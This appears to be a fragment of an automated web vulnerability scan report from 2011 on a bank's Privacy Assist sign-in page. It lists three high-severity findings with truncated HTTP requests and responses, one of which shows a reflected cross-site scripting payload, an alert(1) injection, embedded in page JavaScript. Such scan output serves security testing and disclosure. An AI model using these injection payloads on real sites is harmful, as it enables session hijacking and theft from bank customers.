Severity: | High |
Confidence: | Firm |
Host: | https://privacyassist |
Path: | /Pages/English/In |
GET /Pages/English/In Host: privacyassist.bankof Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33458 Content-Type: text/html X-Powered-By: ASP.NET Date: Tue, 23 Aug 2011 13:25:16 GMT Connection: close <script type="text/javascript"> alert ("Special Characters are not allowed."); location.href = "http://www.bankofamerica </script> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr ...[SNIP]... <a class="menu" title="Home" name="Home_Header_Login ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://privacyassist |
Path: | /Pages/English/In |
GET /Pages/English/In Host: privacyassist.bankof Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33258 Content-Type: text/html X-Powered-By: ASP.NET Date: Tue, 23 Aug 2011 13:25:28 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <title>Bank of America | Privacy Assist | Sign In</title> <meta name="description" content="The s ...[SNIP]... <!-- var strHref = 'https://' + 'privacyassist.banko strHref = strHref.toLowerCase() if (strHref.indexOf('lm { v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://privacyassist |
Path: | /Pages/English/In |
GET /Pages/English/In Host: privacyassist.bankof Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33258 Content-Type: text/html X-Powered-By: ASP.NET Date: Tue, 23 Aug 2011 13:25:26 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <title>Bank of America | Privacy Assist | Sign In</title> <meta name="description" content="The s ...[SNIP]... <!-- function GoPage(page) { var sSQuery = "b4efb"-alert(1)- if ( page == "elert" ) { top.location.href= 'https://idprotect //top.location.href= 'https://test8.inter } else ...[SNIP]... |